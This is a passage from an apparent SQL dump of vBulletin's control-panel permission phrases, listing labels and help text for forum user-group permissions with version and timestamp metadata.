0, ''), (33426, -1, 'can_always_create_discussion', 'cppermission', 'Can Always Create Discussions\r\nIf enabled, the user will also be able to view private and invite only groups.', 'vbulletin', 'vBulletin Solutions', 1223643954, '3.8.0 Beta 1'), (33427, -1, 'can_always_post_message', 'cppermission', 'Can Always Post Messages\r\nIf enabled, the user will also be able to view private and invite only groups.', 'vbulletin', 'vBulletin Solutions', 1223643982, '3.8.0 Beta 1'), (33428, -1, 'can_ban_users', 'cppermission', 'Can Ban Users', 'vbulletin', '', 0, ''), (33429, -1, 'can_comment_pictures', 'cppermission', 'Can Comment on Pictures', 'vbulletin', 'vBulletin Solutions', 1198152711, '3.7.0 Beta 1'), (33430, -1, 'can_create_discussion', 'cppermission', 'Can Create New Discussions in Groups', 'vbulletin', 'vBulletin Solutions', 1210937696, '3.7.1'), (33431, -1, 'can_create_social_groups', 'cppermission', 'Can Create Social Groups', 'vbulletin', 'vBulletin Solutions', 1193766976, '3.7.0 Beta 1'), (33432, -1, 'can_create_tags', 'cppermission', 'Can Create Tags', 'vbulletin', 'vBulletin Solutions', 1190817335, '3.7.0 Beta 1'), (33433, -1, 'can_delete_discussions', 'cppermission', 'Can Delete Discussions', 'vbulletin', 'vBulletin Solutions', 1211464580, '3.7.1'), (33434, -1, 'can_delete_events', 'cppermission', 'Can Delete Events', 'vbulletin', '', 0, ''), (33435, -1, 'can_delete_own_events', 'cppermission', 'Can Delete Own Events', 'vbulletin', '', 0, ''), (33436, -1, 'can_delete_own_picture_comments', 'cppermission', 'Can Delete Own Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198152729, '3.7.0 Beta 1'), (33437, -1, 'can_delete_own_posts', 'cppermission', 'Can Delete Own Posts', 'vbulletin', '', 0, ''), (33438, -1, 'can_delete_own_social_groups', 'cppermission', 'Can Delete Own Social Groups', 'vbulletin', 'vBulletin Solutions', 1193766983, '3.7.0 Beta 1'), (33439, -1, 'can_delete_own_threads', 'cppermission', 'Can Delete Own Threads', 'vbulletin', '', 0, ''), (33440, -1, 'can_delete_own_visitor_messages', 'cppermission', 'Can Delete Own Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1197370769, '3.7.0 Beta 1'), (33441, -1, 'can_delete_picture_comments', 'cppermission', 'Can Delete Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198169784, '3.7.0 Beta 1'), (33442, -1, 'can_delete_posts', 'cppermission', 'Can Delete Posts', 'vbulletin', '', 0, ''), (33443, -1, 'can_delete_social_groups', 'cppermission', 'Can Delete Social Groups', 'vbulletin', 'vBulletin Solutions', 1192546375, '3.7.0 Beta 1'), (33444, -1, 'can_delete_tags_own_threads', 'cppermission', 'Can Delete Tags on Own Threads', 'vbulletin', 'vBulletin Solutions', 1190301015, '3.7.0 Beta 1'), (33445, -1, 'can_deny_pm_receipt', 'cppermission', 'Can Deny Private Message Read Receipt Request', 'vbulletin', '', 0, ''), (33446, -1, 'can_download_attachments', 'cppermission', 'Can Download Attachments', 'vbulletin', '', 0, ''), (33447, -1, 'can_edit_background_image', 'cppermission', 'Can Edit Background Images\r\nUsers must have user album permissions as well', 'vbulletin', 'vBulletin Solutions', 1193400770, '3.7.0 Beta 1'), (33448, -1, 'can_edit_borders', 'cppermission', 'Can Edit Borders\r\nCovers border style, color, and width', 'vbulletin', 'vBulletin Solutions', 1193400794, '3.7.0 Beta 1'), (33449, -1, 'can_edit_colors', 'cppermission', 'Can Edit Colors\r\nCovers font and background colors', 'vbulletin', 'vBulletin Solutions', 1193400739, '3.7.0 Beta 1'), (33450, -1, 'can_edit_discussions', 'cppermission', 'Can Edit Discussions', 'vbulletin', 'vBulletin Solutions', 1211464555, '3.7.1'), (33451, -1, 'can_edit_events', 'cppermission', 'Can Edit Events', 'vbulletin', '', 0, ''), (33452, -1, 'can_edit_font_family', 'cppermission', 'Can Edit Font Family', 'vbulletin', 'vBulletin Solutions', 1193400699, '3.7.0 Beta 1'), (33453, -1, 'can_edit_font_size', 'cppermission', 'Can Edit Font Size', 'vbulletin', 'vBulletin Solutions', 1193400712, '3.7.0 Beta 1'), (33454, -1, 'can_edit_own_events', 'cppermission', 'Can Edit Own Events', 'vbulletin', '', 0, ''), (33455, -1, 'can_edit_own_picture_comments', 'cppermission', 'Can Edit Own Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198152722, '3.7.0 Beta 1'), (33456, -1, 'can_edit_own_posts', 'cppermission', 'Can Edit Own Posts', 'vbulletin', '', 0, ''), (33457, -1, 'can_edit_own_profile', 'cppermission', 'Can Edit Own Profile', 'vbulletin', '', 0, ''), (33458, -1, 'can_edit_own_social_groups', 'cppermission', 'Can Edit Own Social Groups\r\nIf the only member of the group is the owner, he/she will be able to edit the group\'s info regardless of this setting.', 'vbulletin', 'vBulletin Solutions', 1211885031, '3.7.1'), (33459, -1, 'can_edit_own_user_notes', 'cppermission', 'Can Manage Own User NotesNotes that this user has posted, for self or others. This will override the above manage permissions, if enabled.', 'vbulletin', '', 0, ''), (33460, -1, 'can_edit_own_visitor_messages', 'cppermission', 'Can Edit Own Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1197370777, '3.7.0 Beta 1'), (33461, -1, 'can_edit_picture_comments', 'cppermission', 'Can Edit Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198169775, '3.7.0 Beta 1'), (33462, -1, 'can_edit_polls', 'cppermission', 'Can Edit Polls', 'vbulletin', '', 0, ''), (33463, -1, 'can_edit_posts', 'cppermission', 'Can Edit Posts', 'vbulletin', '', 0, ''), (33464, -1, 'can_edit_privacy', 'cppermission', 'Can Edit Profile PrivacyWhether the user can hide blocks on their profile page from other users', 'vbulletin', 'vBulletin Solutions', 1229336470, '3.8.0 Release Candidate 2'), (33465, -1, 'can_edit_social_groups', 'cppermission', 'Can Edit Social Groups', 'vbulletin', 'vBulletin Solutions', 1192710040, '3.7.0 Beta 1'), (33466, -1, 'can_edit_threads', 'cppermission', 'Can Edit Threads', 'vbulletin', '', 0, ''), (33467, -1, 'can_edit_user_avatars', 'cppermission', 'Can Edit User Avatars', 'vbulletin', '', 0, ''), (33468, -1, 'can_edit_user_profile_pictures', 'cppermission', 'Can Edit User Profile Pictures', 'vbulletin', '', 0, ''), (33469, -1, 'can_edit_user_reputation_comments', 'cppermission', 'Can Edit User Reputation Comments', 'vbulletin', '', 0, ''), (33470, -1, 'can_edit_user_signatures', 'cppermission', 'Can Edit User Signatures', 'vbulletin', '', 0, ''), (33471, -1, 'can_email_members', 'cppermission', 'Can Email Members', 'vbulletin', 'vBulletin Solutions', 1145031848, '3.6.0 Beta 1'), (33472, -1, 'can_give_arbitrary_infractions', 'cppermission', 'Can Give Arbitrary Value Infractions', 'vbulletin', 'vBulletin Solutions', 1149878307, '3.6.0 Beta 2'), (33473, -1, 'can_give_infractions', 'cppermission', 'Can Give Infractions to Others', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33474, -1, 'can_have_album', 'cppermission', 'Can Have Album and Upload Pictures', 'vbulletin', 'vBulletin Solutions', 1191938607, '3.7.0 Beta 1'), (33475, -1, 'can_hide_reputation', 'cppermission', 'Can Hide Reputation from Others', 'vbulletin', '', 0, ''), (33476, -1, 'can_ignore_quota', 'cppermission', 'Can send PMs to users who have reached their quota and/or disabled PMs', 'vbulletin', 'vBulletin Solutions', 1229013233, '3.8.6'), (33477, -1, 'can_join_social_groups', 'cppermission', 'Can Join Social Groups', 'vbulletin', 'vBulletin Solutions', 1193767013, '3.7.0 Beta 1'), (33478, -1, 'can_leave_negative_reputation', 'cppermission', 'Can Leave Negative Reputation', 'vbulletin', '', 0, ''), (33479, -1, 'can_limit_discussion', 'cppermission', 'Can Limit Discussions in Own Groups to the Group OwnerIf enabled, the user can configure their social groups so that only they can create new discussions.', 'vbulletin', 'vBulletin Solutions', 1210938314, '3.7.1'), (33480, -1, 'can_manage_comments_own_pictures', 'cppermission', 'Can Manage Comments on Own Pictures', 'vbulletin', 'vBulletin Solutions', 1198152745, '3.7.0 Beta 1'), (33481, -1, 'can_manage_group_discussions', 'cppermission', 'Can Manage Own Discussions', 'vbulletin', 'vBulletin Solutions', 1212052825, '3.7.1'), (33482, -1, 'can_manage_group_messages', 'cppermission', 'Can Manage Own Messages', 'vbulletin', 'vBulletin Solutions', 1211993737, '3.7.1'), (33483, -1, 'can_manage_others_user_notes', 'cppermission', 'Can Manage User Notes About Others', 'vbulletin', '', 0, ''), (33484, -1, 'can_manage_own_social_groups', 'cppermission', 'Can Manage Own Social Groups', 'vbulletin', 'vBulletin Solutions', 1204111309, '3.7.0 Beta 6'), (33485, -1, 'can_manage_own_user_notes', 'cppermission', 'Can Manage User Notes About Self', 'vbulletin', '', 0, ''), (33486, -1, 'can_manage_own_visitor_messages', 'cppermission', 'Can Manage Messages within Own Profile', 'vbulletin', 'vBulletin Solutions', 1197370784, '3.7.0 Beta 1'), (33487, -1, 'can_manage_threads', 'cppermission', 'Can Manage Threads', 'vbulletin', '', 0, ''), (33488, -1, 'can_mass_move_threads', 'cppermission', 'Can Mass-Move Threads', 'vbulletin', '', 0, ''), (33489, -1, 'can_mass_prune_threads', 'cppermission', 'Can Mass-Prune Threads', 'vbulletin', '', 0, ''), (33490, -1, 'can_moderate_attachments', 'cppermission', 'Can Moderate Attachments', 'vbulletin', '', 0, ''), (33491, -1, 'can_moderate_discussions', 'cppermission', 'Can Moderate Discussions', 'vbulletin', 'vBulletin Solutions', 1212054407, '3.7.1'), (33492, -1, 'can_moderate_events', 'cppermission', 'Can Moderate Events', 'vbulletin', '', 0, ''), (33493, -1, 'can_moderate_picture_comments', 'cppermission', 'Can Moderate Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198169046, '3.7.0 Beta 1'), (33494, -1, 'can_moderate_pictures', 'cppermission', 'Can Moderate Pictures', 'vbulletin', 'vBulletin Solutions', 1203548998, '3.7.0 Beta 6'), (33495, -1, 'can_moderate_posts', 'cppermission', 'Can Moderate Posts', 'vbulletin', '', 0, ''), (33496, -1, 'can_move_events', 'cppermission', 'Can Move Events', 'vbulletin', '', 0, ''), (33497, -1, 'can_move_own_threads', 'cppermission', 'Can Move Own Threads', 'vbulletin', '', 0, ''), (33498, -1, 'can_open_close_own_threads', 'cppermission', 'Can Open / Close Own Threads', 'vbulletin', '', 0, ''), (33499, -1, 'can_open_close_threads', 'cppermission', 'Can Open / Close Threads', 'vbulletin', '', 0, ''), (33500, -1, 'can_override_primary_group_title', 'cppermission', 'Can override primary group title/markup', 'vbulletin', '', 0, ''), (33501, -1, 'can_physically_delete_discussions', 'cppermission', 'Can Physically Delete Discussions (Completely removes the discussion and all of it\'s posts from the database)', 'vbulletin', 'vBulletin Solutions', 1211464654, '3.7.1'), (33502, -1, 'can_physically_delete_posts', 'cppermission', 'Can Physically Delete Posts (Completely removes the post from the database)', 'vbulletin', '', 0, ''), (33503, -1, 'can_post_announcements', 'cppermission', 'Can Post Announcements\r\nGranting this permission will allow this user to post announcements containing arbitrary HTML.', 'vbulletin', 'vBulletin Solutions', 1219837672, '3.8.0 Alpha 1'), (33504, -1, 'can_post_attachments', 'cppermission', 'Can Post Attachments', 'vbulletin', '', 0, ''), (33505, -1, 'can_post_events', 'cppermission', 'Can Post Events', 'vbulletin', '', 0, ''), (33506, -1, 'can_post_group_message', 'cppermission', 'Can Post Messages in Groups', 'vbulletin', 'vBulletin Solutions', 1210937630, '3.7.1'), (33507, -1, 'can_post_polls', 'cppermission', 'Can Post Polls', 'vbulletin', '', 0, ''), (33508, -1, 'can_post_threads', 'cppermission', 'Can Post Threads', 'vbulletin', '', 0, ''), (33509, -1, 'can_post_user_notes_about_others', 'cppermission', 'Can Post User Notes About Others', 'vbulletin', '', 0, ''), (33510, -1, 'can_post_user_notes_about_self', 'cppermission', 'Can Post User Notes About Self', 'vbulletin', '', 0, ''), (33511, -1, 'can_post_visitor_messages_to_others_profile', 'cppermission', 'Can Post Visitor Messages to Others\' Profile', 'vbulletin', 'vBulletin Solutions', 1197370809, '3.7.0 Beta 1'), (33512, -1, 'can_post_visitor_messages_to_own_profile', 'cppermission', 'Can Post Visitor Messages to Own Profile', 'vbulletin', 'vBulletin Solutions', 1197370821, '3.7.0 Beta 1'), (33513, -1, 'can_rate_threads', 'cppermission', 'Can Rate Threads', 'vbulletin', '', 0, ''), (33514, -1, 'can_remove_picture_comments', 'cppermission', 'Can Physically Delete Picture Comments\r\n(Completely removes the comment from the database)', 'vbulletin', 'vBulletin Solutions', 1198169989, '3.7.0 Beta 1'), (33515, -1, 'can_reply_to_others_threads', 'cppermission', 'Can Reply to Others\' Threads', 'vbulletin', '', 0, ''), (33516, -1, 'can_reply_to_own_threads', 'cppermission', 'Can Reply to Own Threads', 'vbulletin', '', 0, ''), (33517, -1, 'can_restore_banned_users', 'cppermission', 'Can Restore Banned Users', 'vbulletin', '', 0, ''), (33518, -1, 'can_reverse_infractions', 'cppermission', 'Can Reverse Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33519, -1, 'can_run_maintenance', 'cppermission', 'Can Run Maintenance Tools', 'vbulletin', '', 0, ''), (33520, -1, 'can_search_forum', 'cppermission', 'Can Search Forum', 'vbulletin', '', 0, ''), (33521, -1, 'can_search_forums', 'cppermission', 'Can Search Forums', 'vbulletin', '', 0, ''), (33522, -1, 'can_see_deletion_notices', 'cppermission', 'Can See Deletion Notices', 'vbulletin', '', 0, ''), (33523, -1, 'can_see_invisible_users', 'cppermission', 'Can \'See\' Users Who Have Chosen to be Invisible While Online', 'vbulletin', '', 0, ''), (33524, -1, 'can_see_others_infraction_level', 'cppermission', 'Can See Others\' Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33525, -1, 'can_see_rep_left_for_others', 'cppermission', 'Can See Reputation Left for Others', 'vbulletin', '', 0, ''), (33526, -1, 'can_see_thumbnails', 'cppermission', 'Can See Thumbnails', 'vbulletin', 'vBulletin Solutions', 1219764429, '3.8.0 Alpha 1'), (33527, -1, 'can_see_who_left_user_ratings', 'cppermission', 'Can See Who Left User Ratings', 'vbulletin', '', 0, ''), (33528, -1, 'can_set_forum_password', 'cppermission', 'Can Set Forum Password', 'vbulletin', '', 0, ''), (33529, -1, 'can_set_self_invisible', 'cppermission', 'Can Set Self to Invisible Mode', 'vbulletin', '', 0, ''), (33530, -1, 'can_tag_others_threads', 'cppermission', 'Can Tag Others\' Threads', 'vbulletin', 'vBulletin Solutions', 1190300991, '3.7.0 Beta 1'), (33531, -1, 'can_tag_own_threads', 'cppermission', 'Can Tag Own Threads', 'vbulletin', 'vBulletin Solutions', 1190300980, '3.7.0 Beta 1'), (33532, -1, 'can_transfer_social_groups', 'cppermission', 'Can Transfer Social Groups', 'vbulletin', 'vBulletin Solutions', 1221142239, '3.8.0 Alpha 1'), (33533, -1, 'can_upload_ani_gif_sig_img', 'cppermission', 'Can Upload Animated GIF for Signature', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33534, -1, 'can_upload_animated_avatar', 'cppermission', 'Can Upload Animated Avatar', 'vbulletin', '', 0, ''), (33535, -1, 'can_upload_animated_group_icon', 'cppermission', 'Can Upload Animated Group Icons', 'vbulletin', 'vBulletin Solutions', 1216129879, '3.8.0 Alpha 1'), (33536, -1, 'can_upload_animated_profile_picture', 'cppermission', 'Can Upload Animated Profile Picture', 'vbulletin', '', 0, ''), (33537, -1, 'can_upload_attachments', 'cppermission', 'Can Upload Attachments', 'vbulletin', '', 0, ''), (33538, -1, 'can_upload_custom_avatars', 'cppermission', 'Can Upload Custom Avatars', 'vbulletin', '', 0, ''), (33539, -1, 'can_upload_profile_pictures', 'cppermission', 'Can Upload Profile Pictures', 'vbulletin', '', 0, ''), (33540, -1, 'can_upload_sig_img', 'cppermission', 'Can Upload Images for Signature', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33541, -1, 'can_upload_social_group_icon', 'cppermission', 'Can Upload Social Group Icons', 'vbulletin', 'vBulletin Solutions', 1216129807, '3.8.0 Alpha 1'), (33542, -1, 'can_use_boolean_search', 'cppermission', 'Can Use Boolean Search(Only applies if Fulltext searching is enabled)', 'vbulletin', '', 0, ''), (33543, -1, 'can_use_custom_title', 'cppermission', 'Can Use Custom Title', 'vbulletin', '', 0, ''), (33544, -1, 'can_use_email_to_friend', 'cppermission', 'Can Use Email to Friend', 'vbulletin', '', 0, ''), (33545, -1, 'can_use_friends', 'cppermission', 'Can Use Friends List', 'vbulletin', 'vBulletin Solutions', 1195753761, '3.7.0 Beta 1'), (33546, -1, 'can_use_message_tracking', 'cppermission', 'Can Use Message Tracking', 'vbulletin', '', 0, ''), (33547, -1, 'can_use_reputation', 'cppermission', 'Can Use Reputation', 'vbulletin', '', 0, ''), (33548, -1, 'can_use_signatures', 'cppermission', 'Can Use Signatures', 'vbulletin', '', 0, ''), (33549, -1, 'can_view_albums', 'cppermission', 'Can View Albums\r\nUsers without this permission will still be able to see picture in public and profile album if they know the exact URL.', 'vbulletin', 'vBulletin Solutions', 1199405074, '3.7.0 Beta 4'), (33550, -1, 'can_view_attachments', 'cppermission', 'Can View Attachments', 'vbulletin', '', 0, ''), (33551, -1, 'can_view_calendar', 'cppermission', 'Can View Calendar', 'vbulletin', '', 0, ''), (33552, -1, 'can_view_forum', 'cppermission', 'Can View Forum', 'vbulletin', '', 0, ''), (33553, -1, 'can_view_hidden_custom_fields', 'cppermission', 'Can View Private Custom Fields', 'vbulletin', '', 0, ''), (33554, -1, 'can_view_ip_addresses', 'cppermission', 'Can View IP Addresses', 'vbulletin', '', 0, ''), (33555, -1, 'can_view_member_info', 'cppermission', 'Can View Member Info', 'vbulletin', '', 0, ''), (33556, -1, 'can_view_others_events', 'cppermission', 'Can View Others\' Events', 'vbulletin', '', 0, ''), (33557, -1, 'can_view_others_profile_pictures', 'cppermission', 'Can View Others\' Profile Pictures', 'vbulletin', '', 0, ''), (33558, -1, 'can_view_others_threads', 'cppermission', 'Can View Others\' Threads', 'vbulletin', '', 0, ''), (33559, -1, 'can_view_others_user_notes', 'cppermission', 'Can View User Notes About Others', 'vbulletin', '', 0, ''), (33560, -1, 'can_view_own_user_notes', 'cppermission', 'Can View User Notes About Self', 'vbulletin', '', 0, ''), (33561, -1, 'can_view_social_groups', 'cppermission', 'Can View Social Groups', 'vbulletin', 'vBulletin Solutions', 1193235877, '3.7.0 Beta 1'), (33562, -1, 'can_view_threads', 'cppermission', 'Can View Thread Content', 'vbulletin', '', 0, ''), (33563, -1, 'can_view_whole_profile', 'cppermission', 'Can View Whole User Profile (but not edit)', 'vbulletin', '', 0, ''), (33564, -1, 'can_view_whos_online', 'cppermission', 'Can View Who\'s Online', 'vbulletin', '', 0, ''), (33565, -1, 'can_view_wol_actual_location', 'cppermission', 'Can view actual location of user (filepath/url).', 'vbulletin', '', 0, ''), (33566, -1, 'can_view_wol_bad_location', 'cppermission', 'Can View Detailed Location Info of Users Who Visit Bad / No Permission Locations', 'vbulletin', '', 0, ''), (33567, -1, 'can_view_wol_detail_location', 'cppermission', 'Can View Detailed Location Info for Users', 'vbulletin', '', 0, ''), (33568, -1, 'can_vote_on_polls', 'cppermission', 'Can Vote on Polls', 'vbulletin', '', 0, ''), (33569, -1, 'control_panel_style_choice', 'cppermission', 'Control Panel Style Choice', 'vbulletin', '', 0, ''), (33570, -1, 'copy_permissions_from_forum', 'cppermission', 'Copy Permissions from Forum (Does not include sub-forums)', 'vbulletin', '', 0, ''), (33571, -1, 'copy_permissions_from_group', 'cppermission', 'Copy Permissions from User Group', 'vbulletin', '', 0, ''), (33572, -1, 'copy_permissions_to_forums', 'cppermission', 'Copy Permissions to Forums', 'vbulletin', '', 0, ''), (33573, -1, 'copy_permissions_to_groups', 'cppermission', 'Copy Permissions to User Groups', 'vbulletin', '', 0, ''), (33574, -1, 'custom_avatar_max_filesize', 'cppermission', 'Custom Avatar Maximum File Size (bytes)1KB = 1024 bytes', 'vbulletin', '', 0, ''), (33575, -1, 'custom_avatar_max_height', 'cppermission', 'Custom Avatar Maximum Height (pixels)', 'vbulletin', '', 0, ''), (33576, -1, 'custom_avatar_max_width', 'cppermission', 'Custom Avatar Maximum Width (pixels)', 'vbulletin', '', 0, ''), (33577, -1, 'custom_calendar_permissions', 'cppermission', 'Custom Calendar Permissions', 'vbulletin', '', 0, ''), (33578, -1, 'customized_using_custom_permissions_for_this_usergroup', 'cppermission', 'Customized: Using custom permissions for this usergroup', 'vbulletin', '', 0, ''), (33579, -1, 'default_forum_permissions', 'cppermission', 'Default Forum Permissions', 'vbulletin', '', 0, ''), (33580, -1, 'delete_selected_permissions', 'cppermission', 'Delete Selected Permissions', 'vbulletin', '', 0, ''), (33581, -1, 'deny_all', 'cppermission', 'Deny All', 'vbulletin', '', 0, ''), (33582, -1, 'dismissed_news_item_ids', 'cppermission', 'Dismissed vBulletin News Item IDs', 'vbulletin', 'vBulletin Solutions', 1158158235, '3.6.1'), (33583, -1, 'edit_forum_permissions', 'cppermission', 'Edit Forum Permissions', 'vbulletin', '', 0, ''), (33584, -1, 'edit_forum_permissions_for_usergroup_x_in_forum_y', 'cppermission', 'Edit Forum Permissions For Usergroup:
{1} in Forum {2}', 'vbulletin', '', 0, ''), (33585, -1, 'events_are_unmoderated', 'cppermission', 'Posted Events are Not Moderated', 'vbulletin', '', 0, ''), (33586, -1, 'follow_forum_moderation_rules', 'cppermission', 'Follow Forum Moderation RulesIf no, posts are always placed into moderation queue', 'vbulletin', '', 0, ''), (33587, -1, 'follow_group_message_moderation_rules', 'cppermission', 'Follow Social Group Message Moderation RulesIf no, messages are always placed into moderation queue', 'vbulletin', 'vBulletin Solutions', 1195503890, '3.7.0 Beta 1'), (33588, -1, 'follow_picture_comment_moderation_rules', 'cppermission', 'Follow Picture Comment Moderation Rules', 'vbulletin', 'vBulletin Solutions', 1198152759, '3.7.0 Beta 1'), (33589, -1, 'follow_picture_moderation_rules', 'cppermission', 'Follow Picture Moderation Rules', 'vbulletin', 'vBulletin Solutions', 1203546022, '3.7.0 Beta 6'), (33590, -1, 'follow_visitor_message_moderation_rules', 'cppermission', 'Follow Visitor Message Moderation RulesIf no, messages are always placed into moderation queue', 'vbulletin', 'vBulletin Solutions', 1197370833, '3.7.0 Beta 1'), (33591, -1, 'forum_based_permission_duplicator', 'cppermission', 'Forum-Based Permission Duplicator', 'vbulletin', '', 0, ''), (33592, -1, 'forum_permissions', 'cppermission', 'Forum Permissions', 'vbulletin', '', 0, ''), (33593, -1, 'forum_permissions_manager', 'cppermission', 'Forum Permissions Manager', 'vbulletin', '', 0, ''), (33594, -1, 'forum_searching_permissions', 'cppermission', 'Forum Searching Permissions', 'vbulletin', '', 0, ''), (33595, -1, 'forum_viewing_permissions', 'cppermission', 'Forum Viewing Permissions', 'vbulletin', '', 0, ''), (33596, -1, 'general_permissions', 'cppermission', 'General Permissions', 'vbulletin', '', 0, ''), (33597, -1, 'give_admin_access_arbitrary_html', 'cppermission', 'Giving a user administrative access will allow him or her to create announcements which may contain arbitrary HTML. Only grant this access if you trust this person.', 'vbulletin', 'vBulletin Solutions', 1178885193, '3.6.6'), (33598, -1, 'inherited_using_custom_permissions_inherited_from_a_parent_forum', 'cppermission', 'Inherited: Using custom permissions inherited from a parent forum', 'vbulletin', '', 0, ''), (33599, -1, 'is_banned_group', 'cppermission', 'This Usergroup is not a \'Banned\' Group (Setting this to no will cause the group to be treated as a banned group, this will prevent the sending of email notifications, show a banned error message on the permission error pages and other unspecified behaviors.)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33600, -1, 'is_super_moderator', 'cppermission', 'Can Moderate All Forums (is Super Moderator)', 'vbulletin', '', 0, ''), (33601, -1, 'making_x_a_member_of_the_usergroup_y', 'cppermission', 'Making {1} a member of the usergroup {2}.', 'vbulletin', '', 0, ''), (33602, -1, 'maximum_created_groups', 'cppermission', 'Maximum Created GroupsThe amount of groups the user can have at any one time.', 'vbulletin', 'vBulletin Solutions', 1218709358, '3.8.0 Alpha 1'), (33603, -1, 'maximum_recipients_to_send_pms', 'cppermission', 'Maximum Recipients to Send PMs at a time:Do not set this too high for performance reasons (set to 0 to allow unlimited recipients)', 'vbulletin', 'vBulletin Solutions', 1201136609, '3.7.0 Beta 5'), (33604, -1, 'maximum_stored_messages', 'cppermission', 'Maximum Stored Messages:If you set this to 0 users from this usergroup will not be able to use private messaging.', 'vbulletin', '', 0, ''), (33605, -1, 'message_throttle_quantity', 'cppermission', 'Message Throttle QuantityThis limits the amount of messages the user can send within the Throttle Check Period', 'vbulletin', 'vBulletin Solutions', 1216394948, '3.8.0 Alpha 1'), (33606, -1, 'must_enable_custom_permissions', 'cppermission', 'For this setting to have any effect, custom permissions for this usergroup must be enabled.', 'vbulletin', '', 0, ''), (33607, -1, 'note_groups_marked_with_a_asterisk', 'cppermission', 'Note: Groups marked with an * can be selected by their members to override the username markup and user title from their primary usergroup.', 'vbulletin', 'vBulletin Solutions', 1150742730, '3.6.0 Beta 3'), (33608, -1, 'only_copy_permissions_from_forum', 'cppermission', 'Only Copy Permissions from Forum (Includes sub-forums)', 'vbulletin', '', 0, ''), (33609, -1, 'only_copy_permissions_from_group', 'cppermission', 'Only Copy Permissions from User Group', 'vbulletin', '', 0, ''), (33610, -1, 'order_by_forum', 'cppermission', 'Order By Forum', 'vbulletin', '', 0, ''), (33611, -1, 'order_by_usergroup', 'cppermission', 'Order By Usergroup', 'vbulletin', '', 0, ''), (33612, -1, 'other_users_can_be_posted', 'cppermission', 'User Notes Can Be Posted About This Group', 'vbulletin', '', 0, ''), (33613, -1, 'overwrite_duplicate_entries', 'cppermission', 'Overwrite Duplicate Entries', 'vbulletin', '', 0, ''), (33614, -1, 'overwrite_inherited_entries', 'cppermission', 'Overwrite Inherited Entries', 'vbulletin', '', 0, ''), (33615, -1, 'password_expiry', 'cppermission', 'Password Expiry (If you specify a number of days here, users will be required to change their password when this amount of time elapsed since they last changed)', 'vbulletin', '', 0, ''), (33616, -1, 'password_history', 'cppermission', 'Password History (If you specify a number of days here, users will not be allowed to change their password to a value that they have used in the past x days.
Note: this setting has no effect if password expiry is set to 0 days)
', 'vbulletin', '', 0, ''), (33617, -1, 'permission_duplication_tools', 'cppermission', 'Permission Duplication Tools', 'vbulletin', '', 0, ''), (33618, -1, 'permission_overwrite_notice', 'cppermission', 'Note: These permissions will overwrite any existing permissions for this forum for the selected usergroups', 'vbulletin', '', 0, ''), (33619, -1, 'permissions', 'cppermission', 'Permissions', 'vbulletin', '', 0, ''), (33620, -1, 'permissions_quick_editor', 'cppermission', 'Permissions Quick Editor', 'vbulletin', '', 0, ''), (33621, -1, 'picture_uploading_permissions', 'cppermission', 'Picture Uploading Permissions', 'vbulletin', '', 0, ''), (33622, -1, 'poll_permissions', 'cppermission', 'Poll Permissions', 'vbulletin', '', 0, ''), (33623, -1, 'post_permissions', 'cppermission', 'Post Permissions', 'vbulletin', '', 0, ''), (33624, -1, 'post_thread_permissions', 'cppermission', 'Post / Thread Permissions', 'vbulletin', '', 0, ''), (33625, -1, 'private_message_permissions', 'cppermission', 'Private Message Permissions', 'vbulletin', '', 0, ''), (33626, -1, 'profile_picture_max_filesize', 'cppermission', 'Profile Picture Maximum File Size (bytes)1KB = 1024 bytes', 'vbulletin', '', 0, ''), (33627, -1, 'profile_picture_max_height', 'cppermission', 'Profile Picture Maximum Height (pixels)', 'vbulletin', '', 0, ''), (33628, -1, 'profile_picture_max_width', 'cppermission', 'Profile Picture Maximum Width (pixels)', 'vbulletin', '', 0, ''), (33629, -1, 'quick_forum_permission_setup', 'cppermission', 'Quick Forum Permission Setup', 'vbulletin', '', 0, ''), (33630, -1, 'require_hv_check', 'cppermission', 'Require Human Verification on Configured Actions\r\nUsers will have to pass human verification for the configured Human Verified Actions.', 'vbulletin', 'vBulletin Solutions', 1216636796, '3.8.0 Alpha 1'), (33631, -1, 'show_edited_by_note_on_edited_messages', 'cppermission', 'Show edited by note on edited messages?', 'vbulletin', '', 0, ''), (33632, -1, 'sig_image_max_filesize', 'cppermission', 'Signature Image Maximum Filesize (bytes)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33633, -1, 'sig_image_max_height', 'cppermission', 'Signature Image Maximum Height (pixels)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33634, -1, 'sig_image_max_width', 'cppermission', 'Signature Image Maximum Width (pixels)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33635, -1, 'sig_max_chars', 'cppermission', 'Maximum Characters in Signature Excluding BB Code Markup', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33636, -1, 'sig_max_images', 'cppermission', 'Maximum Number of Images in Signature', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33637, -1, 'sig_max_lines', 'cppermission', 'Maximum Lines in Signature', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33638, -1, 'sig_max_raw_chars', 'cppermission', 'Maximum Characters in Signature Including BB Code Markup', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33639, -1, 'sig_max_size_bbcode', 'cppermission', 'Maximum Value of x for [SIZE=x] BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33640, -1, 'signature_permissions', 'cppermission', 'Signature Permissions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33641, -1, 'social_group_icon_max_size', 'cppermission', 'Maximum File Size of Social Group Icons (bytes) \r\nNote: Social Group Image Icons are always limited to 200px by 